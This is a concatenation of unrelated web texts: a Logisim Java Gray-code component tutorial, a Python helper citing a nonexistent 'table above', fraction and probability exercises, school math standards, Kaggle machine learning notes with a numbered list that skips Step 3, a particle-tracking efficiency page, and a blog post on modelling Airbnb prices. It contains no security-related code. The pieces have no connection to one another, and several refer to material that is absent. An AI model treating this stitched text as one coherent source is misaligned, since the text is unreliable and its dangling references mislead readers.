import com.cburch.logisim.data.Bounds;
import com.cburch.logisim.data.Value;
import com.cburch.logisim.instance.InstanceFactory;
import com.cburch.logisim.instance.InstancePainter;
import com.cburch.logisim.instance.InstanceState;
import com.cburch.logisim.instance.Port;
import com.cburch.logisim.instance.StdAttr;

/** This component takes a multibit input and outputs the value that follows it
 * in Gray Code. For instance, given input 0100 the output is 1100. */
class GrayIncrementer extends InstanceFactory {
    /* Note that there are no instance variables. There is only one instance of
     * this class created, which manages all instances of the component. Any
     * information associated with individual instances should be handled
     * through attributes. For GrayIncrementer, each instance has a "bit width"
     * that it works with, and so we'll have an attribute. */

    /** The constructor configures the factory. */
    GrayIncrementer() {
        super("Gray Code Incrementer");

        /* This is how we can set up the attributes for GrayIncrementers. In
         * this case, there is just one attribute - the width - whose default
         * is 4. The StdAttr class defines several commonly occurring
         * attributes, including one for "bit width." It's best to use those
         * StdAttr attributes when appropriate: A user can then select several
         * components (even from differing factories) with the same attribute
         * and modify them all at once. */
        setAttributes(new Attribute[] { StdAttr.WIDTH },
                new Object[] { BitWidth.create(4) });

        /* The "offset bounds" is the location of the bounding rectangle
         * relative to the mouse location. Here, we're choosing the component to
         * be 30x30, and we're anchoring it relative to its primary output
         * (as is typical for Logisim), which happens to be in the center of the
         * east edge. Thus, the top left corner of the bounding box is 30 pixels
         * west and 15 pixels north of the mouse location. */
        setOffsetBounds(Bounds.create(-30, -15, 30, 30));

        /* The ports are locations where wires can be connected to this
         * component. Each port object says where to find the port relative to
         * the component's anchor location, then whether the port is an
         * input/output/both, and finally the expected bit width for the port.
         * The bit width can be a constant (like 1) or an attribute (as here). */
        setPorts(new Port[] {
                new Port(-30, 0, Port.INPUT, StdAttr.WIDTH),
                new Port(0, 0, Port.OUTPUT, StdAttr.WIDTH),
        });
    }

    /** Computes the current output for this component. This method is invoked
     * any time any of the inputs change their values; it may also be invoked in
     * other circumstances, even if there is no reason to expect it to change
     * anything. */
    public void propagate(InstanceState state) {
        // First we retrieve the value being fed into the input. Note that in
        // the setPorts invocation above, the component's input was included at
        // index 0 in the parameter array, so we use 0 as the parameter below.
        Value in = state.getPort(0);

        // Now compute the output. We've farmed this out to a helper method,
        // since the same logic is needed for the library's other components.
        Value out = nextGray(in);

        // Finally we propagate the output into the circuit. The first parameter
        // is 1 because in our list of ports (configured by invocation of
        // setPorts above) the output is at index 1. The second parameter is the
        // value we want to send on that port. And the last parameter is its
        // "delay" - the number of steps it will take for the output to update
        // after its input.
        state.setPort(1, out, out.getWidth() + 1);
    }

    /** Says how an individual instance should appear on the canvas. */
    public void paintInstance(InstancePainter painter) {
        // As it happens, InstancePainter contains several convenience methods
        // for drawing, and we'll use those here. Frequently, you'd want to
        // retrieve its Graphics object (painter.getGraphics) so you can draw
        // directly onto the canvas.
        painter.drawRectangle(painter.getBounds(), "G+1");
        painter.drawPorts();
    }

    /** Computes the next gray value in the sequence after prev. This static
     * method just does some bit twiddling; it doesn't have much to do with
     * Logisim except that it manipulates Value and BitWidth objects. */
    static Value nextGray(Value prev) {
        BitWidth bits = prev.getBitWidth();
        if(!prev.isFullyDefined()) return Value.createError(bits);
        int x = prev.toIntValue();
        int ct = (x >> 16) ^ x; // compute parity of x
        ct = (ct >> 8) ^ ct;
        ct = (ct >> 4) ^ ct;
        ct = (ct >> 2) ^ ct;
        ct = (ct >> 1) ^ ct;
        if((ct & 1) == 0) { // if parity is even, flip 1's bit
            x = x ^ 1;
        } else { // else flip bit just above last 1
            int y = x ^ (x & (x - 1)); // first compute the last 1
            y = (y << 1) & bits.getMask();
            x = (y == 0 ? 0 : x ^ y);
        }
        return Value.createKnown(bits, x);
    }
}
```

This example by itself is not enough to create a working JAR file; you must also provide a Library class, as illustrated on the next page.

Next: Library Class.
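The bit-twiddling in `nextGray` can be mirrored in a few lines of Python for experimenting outside Logisim. This helper is our own re-derivation of the same trick, not part of the Logisim API:

```python
def next_gray(x, bits=4):
    """Next value after x in the reflected n-bit Gray code, using the same
    parity trick as the Java nextGray: even parity flips the lowest bit,
    odd parity flips the bit just above the lowest set bit."""
    mask = (1 << bits) - 1
    if bin(x).count("1") % 2 == 0:   # even parity: flip the 1's bit
        return x ^ 1
    low = x & -x                     # isolate the lowest set bit
    y = (low << 1) & mask            # the bit just above it
    return 0 if y == 0 else x ^ y    # wrap to 0 when that bit falls off the top
```

Iterating from 0 reproduces the 16-value sequence in the table above.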
https://answers.everydaycalculation.com/simplify-fraction/959-2700
Solutions by everydaycalculation.com

## Reduce 959/2700 to lowest terms

959/2700 is already in the simplest form. It can be written as 0.355185 in decimal form (rounded to 6 decimal places).

#### Steps to simplifying fractions

1. Find the GCD (or HCF) of the numerator and denominator.
   GCD of 959 and 2700 is 1.
2. Divide both the numerator and denominator by the GCD:
   (959 ÷ 1)/(2700 ÷ 1)
3. Reduced fraction: 959/2700.
   Therefore, 959/2700 simplified is 959/2700.
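The two steps above amount to one GCD computation and one division. A generic sketch with Python's standard library (our own helper, not the site's code):

```python
from math import gcd

def simplify(n, d):
    """Reduce the fraction n/d to lowest terms by dividing out the GCD."""
    g = gcd(n, d)
    return n // g, d // g
```

For 959/2700 the GCD is 1, so `simplify(959, 2700)` returns the fraction unchanged.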
https://www.netexplanations.com/rs-aggarwal-class-8-math-twenty-five-chapter-probability-exercise-25a-solution/
# RS Aggarwal Class 8 Math Twenty-Five Chapter Probability Exercise 25A Solution

## EXERCISE 25A

(1) (i) A coin is tossed. What are all possible outcomes?

Ans: All possible outcomes are Head (H) and Tail (T).

(ii) Two coins are tossed simultaneously. What are all possible outcomes?

Ans: HH, HT, TH, TT.

(iii) A die is thrown. What are all possible outcomes?

Ans: 1, 2, 3, 4, 5 and 6.

(iv) From a well-shuffled deck of 52 cards, one card is drawn at random. What is the number of all possible outcomes?

Ans: The number of all possible outcomes is 52. The deck has 13 cards of each suit, namely spades, clubs, hearts and diamonds. Cards of spades and clubs are black cards; cards of hearts and diamonds are red cards. There are 4 honours of each suit, and the kings, queens and jacks are called face cards.

(2) In a single throw of a coin, what is the probability of getting a tail?

Solution: Total number of all possible outcomes = 2. Number of tails = 1.

∴ P(getting a tail) = ½.

(3) In a single throw of two coins, find the probability of getting (i) both tails, (ii) at least 1 tail, (iii) at the most 1 tail.

Solution: Total number of all possible outcomes = 4.

(i) Getting both tails means TT. Number of such outcomes = 1.

∴ P(getting both tails) = ¼.

(ii) Getting at least 1 tail means HT, TH, TT. Number of such outcomes = 3.

∴ P(getting at least 1 tail) = ¾.

(iii) Getting at the most 1 tail means HH, HT, TH. Number of such outcomes = 3.

∴ P(getting at the most 1 tail) = ¾.

(4) A bag contains 4 white and 5 blue balls. They are mixed thoroughly and one ball is drawn at random. What is the probability of getting (i) a white ball? (ii) a blue ball?

Solution: Total number of balls = (4 + 5) = 9.

(i) Number of white balls = 4. ∴ P = 4/9.

(ii) Number of blue balls = 5. ∴ P = 5/9.

(5) A bag contains 5 white, 6 red and 4 green balls. One ball is drawn at random. What is the probability that the ball drawn is (i) green? (ii) white? (iii) non-red?

Solution: Total number of balls = (5 + 6 + 4) = 15.

(i) Number of green balls = 4. ∴ P = 4/15.

(ii) Number of white balls = 5. ∴ P = 5/15 = 1/3.

(iii) Number of non-red balls = (4 + 5) = 9. ∴ P = 9/15 = 3/5.

(6) In a lottery, there are 10 prizes and 20 blanks. A ticket is chosen at random. What is the probability of getting a prize?

Solution: Total number of tickets = (10 + 20) = 30. Number of prizes = 10.

∴ P = 10/30 = 1/3.

(7) It is known that a box of 100 electric bulbs contains 8 defective bulbs. One bulb is taken out at random from the box. What is the probability that the bulb drawn is (i) defective? (ii) non-defective?

Solution: Total number of bulbs = 100.

(i) Number of defective bulbs = 8. ∴ P = 8/100 = 2/25.

(ii) Number of non-defective bulbs = (100 − 8) = 92. ∴ P = 92/100 = 23/25.

(8) A die is thrown at random. Find the probability of getting (i) 2, (ii) a number less than 3, (iii) a composite number, (iv) a number not less than 4.

Solution: In throwing a die, all possible outcomes are 1, 2, 3, 4, 5, 6, so the number of all possible outcomes = 6.

(i) Getting 2 is 1 outcome. ∴ P = 1/6.

(ii) Numbers less than 3 are 1 and 2, i.e. 2 outcomes. ∴ P = 2/6 = 1/3.

(iii) Composite numbers are 4 and 6, i.e. 2 outcomes. ∴ P = 2/6 = 1/3.

(iv) Numbers not less than 4 are 4, 5 and 6, i.e. 3 outcomes. ∴ P = 3/6 = ½.

(9) In a survey of 200 ladies, it was found that 82 like coffee while 118 dislike it. From these ladies, one is chosen at random. What is the probability that the chosen lady dislikes coffee?

Solution: Total number of ladies = 200. Number who dislike coffee = 118.

∴ P = 118/200 = 59/100.

(10) A box contains 19 balls bearing numbers 1, 2, 3, …, 19 respectively. A ball is drawn at random from the box. Find the probability that the number on the ball is (i) a prime number, (ii) an even number, (iii) a number divisible by 3.

Solution: Total number of balls = 19.

(i) Prime numbers are 2, 3, 5, 7, 11, 13, 17, 19, i.e. 8 outcomes. ∴ P = 8/19.

(ii) Even numbers are 2, 4, 6, 8, 10, 12, 14, 16, 18, i.e. 9 outcomes. ∴ P = 9/19.

(iii) Numbers divisible by 3 are 3, 6, 9, 12, 15, 18, i.e. 6 outcomes. ∴ P = 6/19.

(11) One card is drawn at random from a well-shuffled deck of 52 cards. Find the probability that the card drawn is (i) a king, (ii) a spade, (iii) a red queen, (iv) a black 8.

Solution: Total number of cards = 52.

(i) Number of kings = 4. ∴ P = 4/52 = 1/13.

(ii) Number of spades = 13. ∴ P = 13/52 = ¼.

(iii) Number of red queens = 2. ∴ P = 2/52 = 1/26.

(iv) Number of black 8s = 2. ∴ P = 2/52 = 1/26.

(12) One card is drawn at random from a well-shuffled deck of 52 cards. Find the probability that the card drawn is (i) a 4, (ii) a queen, (iii) a black card.

Solution: Total number of cards = 52.

(i) Number of 4s = 4. ∴ P = 4/52 = 1/13.

(ii) Number of queens = 4. ∴ P = 4/52 = 1/13.

(iii) Number of black cards = (13 + 13) = 26. ∴ P = 26/52 = ½.

Updated: December 31, 2018 — 4:11 pm
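Several of the answers above can be verified by brute-force enumeration of the sample space. The snippet below (an illustration with Python's `Fraction`, not part of the textbook) checks the two-coin, die, and numbered-ball cases:

```python
from fractions import Fraction
from itertools import product

# Two coins (exercise 3): enumerate the sample space HH, HT, TH, TT.
coins = list(product("HT", repeat=2))
p_both_tails = Fraction(sum(o == ("T", "T") for o in coins), len(coins))
p_at_least_one_tail = Fraction(sum("T" in o for o in coins), len(coins))
p_at_most_one_tail = Fraction(sum(o.count("T") <= 1 for o in coins), len(coins))

# One die (exercise 8): the composite faces are 4 and 6.
die = range(1, 7)
p_composite = Fraction(sum(n in (4, 6) for n in die), 6)

# Balls numbered 1..19 (exercise 10): primes among them.
primes = {2, 3, 5, 7, 11, 13, 17, 19}
p_prime = Fraction(sum(n in primes for n in range(1, 20)), 19)
```

Enumeration like this is a quick sanity check on the counting arguments; for example, "at the most 1 tail" excludes only TT, giving 3/4.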
https://www.naperville203.org/Page/4115
[ "• ### Instructional time should focus on three critical areas:\n\n• developing fluency with addition and subtraction of fractions, and developing understanding of the multiplication of fractions and of division of fractions in limited cases (unit fractions divided by whole numbers and whole numbers divided by unit fractions);\n• extending division to 2-digit divisors, integrating decimal fractions into the place value system and developing understanding of operations with decimals to hundredths, and developing fluency with whole number and decimal operations; and\n• developing understanding of volume.\n• #### Mathematical Practice Standards\n\n1. Make sense of problems and persevere in solving them.\n2. Reason abstractly and quantitatively.\n3. Construct viable arguments and critique the reasoning of others.\n4. Model with mathematics.\n5. Use appropriate tools strategically.\n6. Attend to precision.\n7. Look for and make use of structure.\n8. Look for and express regularity in repeated reasoning." ]
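The two "limited cases" of fraction division named in the first critical area can be made concrete with exact rational arithmetic. This short sketch is ours, not part of the standards; it uses Python's `fractions.Fraction` and illustrative numbers.

```python
from fractions import Fraction

# Unit fraction divided by a whole number: (1/3) ÷ 4 = 1/12
assert Fraction(1, 3) / 4 == Fraction(1, 12)

# Whole number divided by a unit fraction: 4 ÷ (1/5) = 20
assert 4 / Fraction(1, 5) == 20

# Fluency with addition/subtraction of fractions: 1/2 + 1/3 = 5/6
assert Fraction(1, 2) + Fraction(1, 3) == Fraction(5, 6)
print("all checks pass")
```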
https://mathmusic.org/multiplying-two-fractions-whose-numerators-are-both-1.html
[ "Algebra Tutorials!\n\n# Multiplying Two Fractions Whose Numerators Are Both 1\n\nKey Idea\n\nTo multiply two fractions whose numerators are both 1, multiply the denominators and keep the numerator equal to 1.\n\nExample 1", null, "## Why Does This Procedure Work?\n\nRecall that one way to model the multiplication of two whole numbers is to draw a rectangle whose length and width are the two numbers. After dividing the rectangle into unit squares, counting the unit squares gives the product of the two whole numbers. For example, consider the product 2 × 3 modeled below.", null, "The model shows that 2 × 3 = 6. Modeling the product of two fractions is slightly different. Begin with two segments of the same length. Divide one segment into the number of equal parts indicated by the denominator of the first fraction. Divide the other segment into the number of equal parts indicated by the denominator of the second fraction. Suppose that we want to multiply 1/3 and 1/4. Divide one segment into 3 equal parts and the other into 4 equal parts. Since the numerator of each fraction is 1, darken one of the parts of each segment. 
This is shown in the figure below.", null, "Next, we use the segments as two of the adjacent sides of a square. The marks on the segments are used to divide the square into smaller regions that are all the same size. Finally, we shade the smaller region formed by the two darkened parts of the segments.", null, "The shaded region represents the product of the fractions. It is one of the 12 regions of equal size into which the square is divided. Since each side of the square represents a length of 1, the square has an area of 1 square unit. Therefore, the shaded region represents the fraction 1/12. The model shows that 1/3 × 1/4 = 1/12." ]
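The key idea above can be confirmed with exact rational arithmetic. The sketch below is ours, not part of the tutorial; `multiply_unit_fractions` is a hypothetical helper name.

```python
from fractions import Fraction

def multiply_unit_fractions(b, d):
    # Key idea: 1/b × 1/d = 1/(b·d) — the numerator stays 1
    # and the denominators multiply.
    return Fraction(1, b) * Fraction(1, d)

# The worked example from the area model: 1/3 × 1/4 = 1/12.
assert multiply_unit_fractions(3, 4) == Fraction(1, 12)
assert multiply_unit_fractions(2, 5) == Fraction(1, 10)

# The numerator of the product is always 1 (Fraction keeps results reduced).
assert multiply_unit_fractions(7, 9).numerator == 1
print("all checks pass")
```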
https://joapen.com/blog/2021/04/22/introduction-to-machine-learning-in-kaggle/
[ "# Introduction to Machine Learning in Kaggle\n\nI’m going through the course “Intro to Machine Learning”, and I would like to keep some notes about it.\n\n## My first machine learning code\n\n``````# Code you have previously used to load data\nimport pandas as pd\n\n# Path of the file to read\niowa_file_path = '../input/home-data-for-ml-course/train.csv'\n\n# Read the data into a DataFrame\nhome_data = pd.read_csv(iowa_file_path)\n\n# Set up code checking\nfrom learntools.core import binder\nbinder.bind(globals())\nfrom learntools.machine_learning.ex3 import *\n\n# print the list of columns in the dataset to find the name of the prediction target\nhome_data.columns\n\n# Set the target (price)\ny = home_data.SalePrice\n\n# Create the list of features below\nfeature_names = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\n\n# Select data corresponding to features in feature_names\nX = home_data[feature_names]\n\n# Review data\n# print description or statistics from X\nprint(X.describe())\n\n# print the top few lines\nprint(X.head())\n\n# Specify the model.\n# For model reproducibility, set a numeric value for random_state when specifying the model\nfrom sklearn.tree import DecisionTreeRegressor\niowa_model = DecisionTreeRegressor(random_state=1)\n\n# Fit the model\niowa_model.fit(X, y)\n\npredictions = iowa_model.predict(X)\nprint(predictions)\n\n``````\n\n## Model validation\n\nIn almost all applications, the relevant measure of model quality is predictive accuracy. 
In other words, will the model’s predictions be close to what actually happens?\n\nThe Mean Absolute Error (MAE) gives us the average of the absolute values of the errors.\n\n``````# Split the data into training and validation sets\nfrom sklearn.model_selection import train_test_split\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=1)\n\n# Specify the model\niowa_model = DecisionTreeRegressor(random_state=1)\n\n# Fit iowa_model with the training data.\niowa_model.fit(train_X, train_y)\n\n# Predict with all validation observations\nval_predictions = iowa_model.predict(val_X)\n\n# print the top few validation predictions\nprint(val_predictions)\n\nfrom sklearn.metrics import mean_absolute_error\nval_mae = mean_absolute_error(val_y, val_predictions)\n\n# print the validation MAE\nprint(val_mae)``````\n\n#### Some machine learning metrics:\n\n• Accuracy\n• Confusion Matrix\n• Area Under the ROC Curve (AUC)\n• F1 Score\n• Precision-Recall Curve\n• Log/Cross Entropy Loss\n• Mean Squared Error\n• Mean Absolute Error\n\n## Underfitting and overfitting\n\nModels can suffer from either:\n\n• Overfitting: capturing spurious patterns that won’t recur in the future, leading to less accurate predictions, or\n• Underfitting: failing to capture relevant patterns, again leading to less accurate predictions.\n\n## The 7 Steps of Machine Learning\n\n• Step 1: Gather the data. When participating in a Kaggle competition, this step is already completed for you.\n• Step 2: Prepare the data – Deal with missing values and categorical data. (Feature engineering is covered in a separate course.)\n• Step 4: Train the model – Fit decision trees and random forests to patterns in training data.\n• Step 5: Evaluate the model – Use a validation set to assess how well a trained model performs on unseen data.\n• Step 6: Tune parameters – Tune parameters to get better performance from XGBoost models.\n• Step 7: Get predictions – Generate predictions with a trained model and submit your results to a Kaggle competition.\n\n#### Automated machine learning (AutoML)\n\nRead how to use Google Cloud AutoML Tables to automate the machine learning process. 
While Kaggle has already taken care of the data collection, AutoML Tables will take care of all remaining steps." ]
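Since MAE is the metric driving the validation step above, it helps to see it computed by hand. The sketch below is ours, not from the course: it re-implements the mean absolute error without scikit-learn and scores a trivial always-predict-the-median baseline; all names and numbers are illustrative.

```python
def mean_absolute_error(y_true, y_pred):
    # MAE: the average of |prediction - actual| over all observations.
    return sum(abs(t - p) for t, p in zip(y_true, y_pred)) / len(y_true)

def median_value(xs):
    # A trivial "model" that always predicts the (upper) median of the
    # training target — a useful floor for any real model to beat.
    s = sorted(xs)
    return s[len(s) // 2]

train_y = [200, 150, 320, 180, 240]   # illustrative training prices
val_y = [210, 160, 300]               # illustrative validation prices

baseline = median_value(train_y)      # 200
val_predictions = [baseline] * len(val_y)
print(mean_absolute_error(val_y, val_predictions))  # → 50.0
```

A fitted model whose validation MAE cannot beat such a constant baseline is a sign of underfitting or a broken pipeline.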
https://halldweb.jlab.org/single_track/2012-02-28/
[ "Single track reconstruction\n\nYellow lines indicate recommended fiducial cuts. The vertical lines are at θ = 1° and θ = 130°.\n\nPion events\n\nOverall efficiency = 0.9587\nEfficiency (Prob > 0.001) = 0.793996\nMomentum cut: p = 0.116635 + 0.00725593 θ − 0.000143586 θ² + 7.39252e-07 θ³\n\n[Figures: probability, efficiency, efficiency with χ² cut, Δp vs θ, Δp vs p vs θ]\n\nProton events\n\nOverall efficiency = 0.93759\nEfficiency (Prob > 0.001) = 0.759162\nMomentum cut: p = 0.444242 − 0.00195075 θ − 3.42498e-05 θ² + 3.26844e-07 θ³\n\n[Figures: probability, efficiency, efficiency with χ² cut, Δp vs θ, Δp vs p vs θ]" ]
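The momentum cuts quoted above are cubics in the polar angle θ, so applying the fiducial selection in code is a one-liner per track. The sketch below is ours, not from the analysis: the coefficient values are copied verbatim from this page, θ is assumed to be in degrees (consistent with the quoted 1°–130° range), and the momentum units are whatever the source uses.

```python
def momentum_cut(theta_deg, coeffs):
    # Minimum-momentum fiducial cut p(θ) as a cubic in the polar angle.
    c0, c1, c2, c3 = coeffs
    return c0 + c1 * theta_deg + c2 * theta_deg**2 + c3 * theta_deg**3

# Coefficients quoted in the text above.
PION = (0.116635, 0.00725593, -0.000143586, 7.39252e-07)
PROTON = (0.444242, -0.00195075, -3.42498e-05, 3.26844e-07)

def passes_fiducial(p, theta_deg, coeffs):
    # Keep tracks inside the 1°–130° angular range and above the momentum cut.
    return 1.0 <= theta_deg <= 130.0 and p > momentum_cut(theta_deg, coeffs)

print(round(momentum_cut(20.0, PION), 4))  # → 0.2102
print(passes_fiducial(1.0, 20.0, PION))    # → True
```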
https://www.r-bloggers.com/2018/10/modeling-airbnb-prices/
[ "In this post we’re going to model the prices of Airbnb apartments in London. In other words, the aim is to build our own price suggestion model. We will be using data from http://insideairbnb.com/ which we collected in April 2018. This work is inspired by the Airbnb price prediction model built by Dino Rodriguez, Chase Davis, and Ayomide Opeyemi. Normally we would be doing this in R but we thought we’d try our hand at Python for a change.\n\nWe present a shortened version here, but the full version is available on our GitHub.\n\n## Data Preprocessing\n\nFirst, we import the listings gathered in the csv file.\n\nimport pandas as pd\nlistings_file_path = 'listings.csv.gz'\nlistings = pd.read_csv(listings_file_path)\nlistings.columns\nIndex(['id', 'listing_url', 'scrape_id', 'last_scraped', 'name', 'summary',\n'space', 'description', 'experiences_offered', 'neighborhood_overview',\n'notes', 'transit', 'access', 'interaction', 'house_rules',\n'thumbnail_url', 'medium_url', 'picture_url', 'xl_picture_url',\n'host_id', 'host_url', 'host_name', 'host_since', 'host_location',\n'host_acceptance_rate', 'host_is_superhost', 'host_thumbnail_url',\n'host_picture_url', 'host_neighbourhood', 'host_listings_count',\n'host_total_listings_count', 'host_verifications',\n'host_has_profile_pic', 'host_identity_verified', 'street',\n'neighbourhood', 'neighbourhood_cleansed',\n'neighbourhood_group_cleansed', 'city', 'state', 'zipcode', 'market',\n'smart_location', 'country_code', 'country', 'latitude', 'longitude',\n'is_location_exact', 'property_type', 'room_type', 'accommodates',\n'bathrooms', 'bedrooms', 'beds', 'bed_type', 'amenities', 'square_feet',\n'price', 'weekly_price', 'monthly_price', 'security_deposit',\n'cleaning_fee', 'guests_included', 'extra_people', 'minimum_nights',\n'maximum_nights', 'calendar_updated', 'has_availability',\n'availability_30', 'availability_60', 'availability_90',\n'availability_365', 
'calendar_last_scraped', 'number_of_reviews',\n'first_review', 'last_review', 'review_scores_rating',\n'review_scores_accuracy', 'review_scores_cleanliness',\n'review_scores_checkin', 'review_scores_communication',\n'cancellation_policy', 'require_guest_profile_picture',\n'require_guest_phone_verification', 'calculated_host_listings_count',\n'reviews_per_month'],\ndtype='object')\n\nThe data has 95 columns or features. Our first step is to perform feature selection to reduce this number.\n\n### Feature selection\n\n#### Selection on Missing Data\n\nFeatures that have a high number of missing values aren’t useful for our model so we should remove them.\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\npercentage_missing_data = listings.isnull().sum() / listings.shape[0]\nax = percentage_missing_data.plot(kind = 'bar', color='#E35A5C', figsize = (16, 5))\nax.set_xlabel('Feature')\nax.set_ylabel('Percent Empty / NaN')\nax.set_title('Feature Emptiness')\nplt.show()\n\nAs we can see, the features neighbourhood_group_cleansed, square_feet, has_availability, license and jurisdiction_names mostly have missing values. The features neighbourhood, cleaning_fee and security_deposit are more than 30% empty which is too much in our opinion. 
The zipcode feature also has some missing values but we can either remove these values or impute them within reasonable accuracy.\n\nuseless = ['neighbourhood', 'neighbourhood_group_cleansed', 'square_feet', 'security_deposit', 'cleaning_fee',\n           'has_availability', 'license', 'jurisdiction_names']\nlistings.drop(useless, axis=1, inplace=True)\n\n#### Selection on Sparse Categorical Features\n\nLet’s have a look at the categorical data to see the number of unique values.\n\ncategories = listings.columns[listings.dtypes == 'object']\npercentage_unique = listings[categories].nunique() / listings.shape[0]\n\nax = percentage_unique.plot(kind = 'bar', color='#E35A5C', figsize = (16, 5))\nax.set_xlabel('Feature')\nax.set_ylabel('Percent # Unique')\nax.set_title('Feature Uniqueness')\nplt.show()\n\nWe can see that the street and amenities features have a large number of unique values. It would require some natural language processing to properly wrangle these into useful features. We believe we have enough location information with neighbourhood_cleansed and zipcode so we’ll remove street. We also remove the amenities, calendar_updated and calendar_last_scraped features as these are too complicated to process for the moment.\n\nto_drop = ['street', 'amenities', 'calendar_last_scraped', 'calendar_updated']\nlistings.drop(to_drop, axis=1, inplace=True)\n\nNow, let’s have a look at the zipcode feature. The above visualisation shows us that there are lots of different postcodes, maybe too many?\n\nprint(\"Number of Zipcodes:\", listings['zipcode'].nunique())\nNumber of Zipcodes: 24774\n\nIndeed, there are too many zipcodes. If we leave this feature as is it might cause overfitting. Instead, we can regroup the postcodes. At the moment, they are separated as in the following example: KT1 1PE. We’ll keep the first part of the zipcode (e.g. 
KT1) and accept that this gives us some less precise location information.\n\nlistings['zipcode'] = listings['zipcode'].str.slice(0,3)\nlistings['zipcode'] = listings['zipcode'].fillna(\"OTHER\")\nprint(\"Number of Zipcodes:\", listings['zipcode'].nunique())\nNumber of Zipcodes: 461\n\nA lot of zipcodes contain less than 100 apartments and a few zipcodes contain most of the apartments. Let’s keep these ones.\n\ncount_per_zipcode = listings['zipcode'].value_counts()\nrelevant_zipcodes = count_per_zipcode[count_per_zipcode > 100].index\nlistings_zip_filtered = listings[listings['zipcode'].isin(relevant_zipcodes)]\n\n# Plot new zipcodes distribution\ncount_per_zipcode = listings_zip_filtered['zipcode'].value_counts()\nax = count_per_zipcode.plot(kind='bar', figsize = (22,4), color = '#E35A5C', alpha = 0.85)\nax.set_title(\"Zipcodes by Number of Listings\")\nax.set_xlabel(\"Zipcode\")\nax.set_ylabel(\"# of Listings\")\n\nplt.show()\n\nprint('Number of entries removed: ', listings.shape[0] - listings_zip_filtered.shape[0])\nNumber of entries removed: 5484\n\nThis distribution is much better, and we only removed 5484 rows from our dataframe which contained about 53904 rows.\n\n#### Selection on Correlated Features\n\nNext we look at correlations.\n\nimport numpy as np\nfrom sklearn import preprocessing\n\n# Function to label encode categorical variables.\n# Input: array (array of values)\n# Output: array (array of encoded values)\ndef encode_categorical(array):\n    if not array.dtype == np.dtype('float64'):\n        return preprocessing.LabelEncoder().fit_transform(array)\n    else:\n        return array\n\n# Temporary dataframe\ntemp_data = listings_zip_filtered.copy()\n\n# Delete additional entries with NaN values\ntemp_data = temp_data.dropna(axis=0)\n\n# Encode categorical data\ntemp_data = temp_data.apply(encode_categorical)\n# Compute matrix of correlation coefficients\ncorr_matrix = temp_data.corr()\n# Display heat map\nplt.figure(figsize=(7, 7))\nplt.pcolor(corr_matrix, cmap='RdBu')\nplt.xlabel('Predictor Index')\nplt.ylabel('Predictor 
Index')\nplt.title('Heatmap of Correlation Matrix')\nplt.colorbar()\n\nplt.show()\n\nThis reveals that calculated_host_listings_count is highly correlated with host_total_listings_count so we’ll keep the latter. We also see that the availability_* variables are correlated with each other. We’ll keep availability_365 as this one is less correlated with other variables. Finally, we decide to drop requires_license, which has an odd correlation result of NA’s and will not be useful in our model.\n\nuseless = ['calculated_host_listings_count', 'availability_30', 'availability_60', 'availability_90', 'requires_license']\nlistings_processed = listings_zip_filtered.drop(useless, axis=1)\n\n### Data Splitting: Features / labels – Training set / testing set\n\nNow we split into features and labels, and into training and testing sets. We also convert the train and test dataframes into NumPy arrays so that they can be used to train and test the models.\n\n# Shuffle the data to ensure a good distribution for the training and testing sets\nfrom sklearn.utils import shuffle\nlistings_processed = shuffle(listings_processed)\n\n# Extract features and labels\ny = listings_processed['price']\nX = listings_processed.drop('price', axis = 1)\n\n# Training and Testing Sets\nfrom sklearn.model_selection import train_test_split\ntrain_X, test_X, train_y, test_y = train_test_split(X, y, random_state = 0)\n\ntrain_X = np.array(train_X)\ntest_X = np.array(test_X)\ntrain_y = np.array(train_y)\ntest_y = np.array(test_y)\n\ntrain_X.shape, test_X.shape\n((36185, 170), (12062, 170))\n\n## Modelling\n\nNow that the data preprocessing is over, we can start the second part of this work: applying different Machine Learning models. 
We decided to apply 3 different models:\n\n• Random Forest, with the RandomForestRegressor from the Scikit-learn library\n• Gradient Boosting method, with the XGBRegressor from the XGBoost library\n• Neural Network, with the MLPRegressor from the Scikit-learn library.\n\nEach time, we applied the model with its default hyperparameters and we then tuned the model in order to get the best hyperparameters. The metric we use to evaluate the models is the median absolute error, due to the presence of extreme outliers and skewness in the data set.\n\nWe only show the code for the Random Forest here; for the rest of the code please see the full version of this blogpost on our GitHub.\n\n### Application of the Random Forest Regressor\n\n#### With default hyperparameters\n\nWe first create a pipeline that imputes the missing values, then scales the data and finally applies the model. We then fit this pipeline to the training set.\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.preprocessing import StandardScaler\n\n# Create the pipeline (imputer + scaler + regressor)\nmy_pipeline_RF = make_pipeline(Imputer(), StandardScaler(),\n                               RandomForestRegressor(random_state=42))\n\n# Fit the model\nmy_pipeline_RF.fit(train_X, train_y)\n\nWe evaluate this model on the test set, using the median absolute error to measure the performance of the model. We’ll also include the root-mean-square error (RMSE) for completeness. 
Since we’ll be doing this repeatedly, it is good practice to create a function.

```python
from sklearn.metrics import median_absolute_error
from sklearn.metrics import mean_squared_error
from math import sqrt

def evaluate_model(model, predict_set, evaluate_set):
    predictions = model.predict(predict_set)
    print("Median Absolute Error: " + str(round(median_absolute_error(predictions, evaluate_set), 2)))
    RMSE = round(sqrt(mean_squared_error(predictions, evaluate_set)), 2)
    print("RMSE: " + str(RMSE))

evaluate_model(my_pipeline_RF, test_X, test_y)
```

```
Median Absolute Error: 14.2
RMSE: 126.16
```

#### Hyperparameter tuning

We had some good results with the default hyperparameters of the Random Forest regressor, but we can improve them with some hyperparameter tuning. There are two main methods available for this:

• Random search
• Grid search

You provide a parameter grid to either method, and both try different combinations of parameters within that grid. The difference is that random search tries only a sample of the combinations, whereas grid search tries every possible combination in the grid you provided.

We started with a random search to roughly evaluate a good combination of parameters.
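To get a feel for why we start with a random search, we can count the candidate combinations in the grid we are about to define (the sizes below are taken from that grid); random search samples only a small fraction of them:

```python
# Sizes of each hyperparameter list in the random grid
grid_sizes = {
    'n_estimators': 11,      # 11 values from np.linspace(10, 1000, num=11)
    'max_features': 2,       # ['auto', 'sqrt']
    'max_depth': 6,          # 5 linspace values plus None
    'min_samples_split': 3,  # [2, 5, 10]
    'min_samples_leaf': 3,   # [1, 2, 4]
    'bootstrap': 2,          # [True, False]
}

total_combinations = 1
for size in grid_sizes.values():
    total_combinations *= size

print(total_combinations)       # 2376 candidates an exhaustive grid search would fit
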